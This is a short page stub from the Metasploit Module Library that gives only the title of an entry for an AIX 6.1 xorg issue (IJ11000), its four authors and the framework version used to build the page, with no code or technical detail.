- AIX 6.1 TL 9 : xorg (IJ11000)
Authors
- Narendra Shinde
- Raptor - 0xdea
- Aaron Ringo
- bcoles
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.